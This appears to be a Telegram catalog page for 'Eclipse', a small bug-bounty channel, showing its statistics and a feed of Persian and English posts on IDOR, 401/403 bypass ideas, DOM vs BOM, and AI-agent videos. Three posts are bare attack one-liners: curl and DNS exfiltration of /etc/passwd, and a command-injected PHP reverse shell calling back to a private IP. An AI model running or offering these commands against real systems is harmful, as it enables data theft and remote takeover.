tgindex
Eclipse
@eclipse0x00английский

🩸 WE RISE FROM THE ASHES 🩸 > The Sun has fallen. 🌑 > A new era begins. 🔥 A Cyber Security Community for: 🕵️ Bug Bounty 💻 Ethical Hacking 🔍 Security Research ⚔️ Learn • Hunt • Evolve

Последний пост
13 авг.
Последнее чтение
12 авг.
Постов за неделю
9
Всего постов
24
Тип
открытый
Язык
английский
В каталоге с
12 авг.
Подписчики
50
+14 за 4 дн.
Сутки
+8
+19,05%
Неделя
 
Месяц
 
Просмотров на пост
71
20 постов
Вовлечённость
142,0%
к подписчикам
Постов в день
1,3
всего 24
Упоминаний
1
каналов
Охват размещения
оценка
1/24сутки в ленте
26
1/48двое суток
29
1/72трое суток
32

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • без подписи

  • без подписи

  • без подписи

  • без подписи

  • 💀🌑 [ ECLIPSE IS HERE ] 🌑💀 ⚠️ SYSTEM WARNING The Sun is fading... The shadow is taking over. 🌑 ☀️ TOTAL SOLAR ECLIPSE — 12 AUG 2026 🩸 The light disappears. 🌑 The darkness awakens. ⛓️ The world falls silent. From the ashes, we are born. 🔥 Through darkness, we ascend. 🩸 We were chosen... Not to follow the light, but to become the hand of God. 👁 ⚔️ WE ARE THE GOD HAND. The eclipse is not the end. It is our destiny. Trust no light. Embrace the Eclipse. 🌑

  • 🧩 IDOR — Insecure Direct Object References ━━━━━━━━━━━━━━━━━━━━ یه باگ ساده اما خطرناک. جایی که برنامه بهت اجازه میده با تغییر یه پارامتر، به اطلاعات دیگران دسترسی پیدا کنی. مثال: /profile?id=1001 ➡️ پروفایل خودت /profile?id=1002 ➡️ پروفایل یکی دیگه 🫣 ━━━━━━━━━━━━━━━━━━━━ 🎯 چرا خطرناکه؟ چون دسترسی به منابع، فقط بر اساس ورودی کاربر چک میشه. نه بر اساس نقش، نه سطح دسترسی، نه هویت واقعی. 🔓 فقط یه عدد رو تغییر دادی و وارد شدی. ━━━━━━━━━━━━━━━━━━━━ 🛡 چطور تستش کنی؟ ✅ تغییر ID در URL (?id=, ?user=, ?file=) ✅ تغییر پارامترهای POST ✅ تغییر UUID یا توکن‌های قابل حدس ✅ تغییر مسیرهای API مثل /api/order/1001 → /api/order/1002 ━━━━━━━━━━━━━━━━━━━━ ⚠️ همیشه به فکر Access Control باش! ابزارت فقط یه مرورگر و یه ذهن کنجکاوه. ━━━━━━━━━━━━━━━━━━━━ #BugBounty #IDOR #WebSecurity #AccessControl #Hunt #Hack #EthicalHacking #InfoSec #CyberSecurity #Pentesting #Eclipse 🌑 @eclipse0x00

  • https://freedium-mirror.cfd/https://medium.com/@Aacle/how-to-build-a-recon-workflow-that-actually-finds-bugs-not-just-data-12167d2d93e8

  • WHO WANTS TO BE KING?

  • 🔍 403 Forbidden vs 401 Unauthorized خیلی‌ها این دو رو یکی می‌دونن، اما تفاوتشون چیه؟ 🛑 401 Unauthorized یعنی هويت نداری. احراز هویت نشدی. بهت می‌گه: "تو کی هستی؟" 🚫 403 Forbidden یعنی هويت داری، اما دسترسی نداری. بهت می‌گه: "می‌دونم کی هستی، ولی نمی‌ذارم بری تو." ━━━━━━━━━━━━━━━━━━━━ 💡 چرا تو Bug Bounty مهمه؟ 🔓 401 ✅ می‌تونی با دستکاری هدرها (Authorization, JWT, Cookie) دور بزنی ✅ بروت‌فورس روی Credentials ✅ تست‌کردن نقش‌های مختلف کاربری 🔓 403 ✅ می‌تونی با تغییر هدرها یا پارامترها بایپس کنی (مثل X-Forwarded-For, Host) ✅ تست IDOR و دسترسی به منابع دیگران ✅ بروت‌فورس روی مسیرها و فایل‌های مخفی ✅ تغییر Method (GET → POST → PUT) یا تغییر Content-Type ⚠️ هیچوقت فقط به Status Code اکتفا نکن! هر دو ممکنه با تغییر نقش کاربر یا سطح دسترسی دور زده بشن. ━━━━━━━━━━━━━━━━━━━━ #BugBounty #WebSecurity #Error403 #Error401 #Hunt #Hack #EthicalHacking #InfoSec #Security #CyberSecurity #Bypass #IDOR #Eclipse 🌑 @eclipse0x00

  • https://open.spotify.com/track/6QCZF4g0eAwuI3DLspAREX?si=5kVIe_ivSBK2HSqX-s7tOQ&utm_source=copy-link&sci=spotify%3Acard-config%3A4VLFfCZnea0SbxRUBa7Js7

  • 9 авг.3141из upvex_sec

    سلام رفقا امید وارم حالتون عالی باشه ویدیو جدید در مورد ai agent ها منتشر شد تو این ویدیو رفتیم سراغ مفاهیم پایه‌ای‌ و در عین حال مهم دنیای هوش مصنوعی و باهم بررسیشون کردیم: ✅اولین بحث LLM چیه و چطور کار می‌کنه ✅ فرق بین یه چت‌باکس ساده و یه Agent واقعی ✅ ویژگی‌های کلیدی یک Agent: Loop، Tool Use، Memory، Skills و بیشتر ✅ روش‌های مختلف تهیه‌ی LLM برای Agent (لوکال، رایگان، اشتراک یا API) ✅ تو پارت بعدی میریم سراغ نصب Hermes و شروع کار عملی https://www.youtube.com/watch?v=N6RDAReH2QI

  • File Send With Curl: curl -F "file=@/etc/passwd" http://192.168.115.154/ curl -T /etc/passwd http://192.168.115.154/

  • File Send With DNS: dig @192.168.115.154 $(cat passwd | base64 | tr -d '\n' | fold -w50 | head -n1).test.com

  • Reverse Shell on PHP: 0;php -r '$sock=fsockopen("192.168.67.23",9001);exec("sh <&3 >&3 2>&3");'

  • 9 авг.3351из web_articles

    Author: zarvan Language: Persian Telegram channel: @web_articles

  • 9 авг.3651из web_articles

    Author: zarvan Language: Persian Telegram channel: @web_articles

  • 9 авг.3941из web_articles

    درود دوستان چند وقتی بود میخواستم این کتاب رو آماده کنم. اما وقت نمیشد تصمیم گرفتم کم کم پیش برم. سعی میکنم هر چند روز یک ( شایدم زودتر) بار یه فصلش رو آماده کنم.

  • 8 авг.3131из jadivarlog

    دیدیم که ایجنت دقیقا چیه و وقتشه که ایجنت خودمون رو داشته باشیم! مستقل از بحث فنی اگر امکانش رو دارین این رو راه بندازین و شاید در زندگی روزمره هم براتون مفید باشه (: توی این ویدئو با استفاده از مدل های زبانی یکی از ایجنت های مرسوم رو راه می ندازیم ولی حینش کلی هم گپ و گفت در مورد مفاهیم می زنیم تا دقیقا بفهمیم داریم چیکار می کنیم. https://youtu.be/mGMRzB-c8NA #هوش_مصنوعی #ویدئو

  • https://open.spotify.com/track/6BnxBf4umXVTwbEOvDpHXO?si=GUYsFNMtT2iM3lH5xllXIQ&utm_source=native-share-menu

  • 8 авг.564412

    🧠 DOM & BOM — JavaScript و مرورگر ━━━━━━━━━━━━━━━━━━━━ 🌐 DOM — Document Object Model DOM یک API هست که فایل‌های HTML / XML رو به شکل یک مدل شی‌گرا در اختیار JavaScript قرار می‌ده تا JS بتونه با ساختار و محتوای صفحه تعامل داشته باشه. ⚠️ DOM ≠ HTML DOM = نتیجه‌ی تفسیر HTML توسط مرورگر JavaScript برای دستکاری ساختار HTML در صفحه، از DOM استفاده می‌کنه. // DOM document.getElementById("x") ━━━━━━━━━━━━━━━━━━━━ 🌍 BOM — Browser Object Model BOM یک API برای تعامل JavaScript با محیط مرورگر هست و اطلاعات و قابلیت‌های مربوط به مرورگر رو به شکل یک مدل شی‌گرا در اختیار JS قرار می‌ده. // BOM location.href = "https://example.com" ━━━━━━━━━━━━━━━━━━━━ 🧩 DOM vs BOM 🌐 DOM → محتوا و ساختار صفحه 🌍 BOM → خود مرورگر و رفتارهاش ━━━━━━━━━━━━━━━━━━━━ 💡 نکته مهم DOM خودش HTML رو تفسیر نمی‌کنه. 🔹 تفسیر HTML → وظیفه‌ی مرورگر 🔹 نتیجه‌ی این تفسیر → DOM ━━━━━━━━━━━━━━━━━━━━ 🌑 @eclipse0x00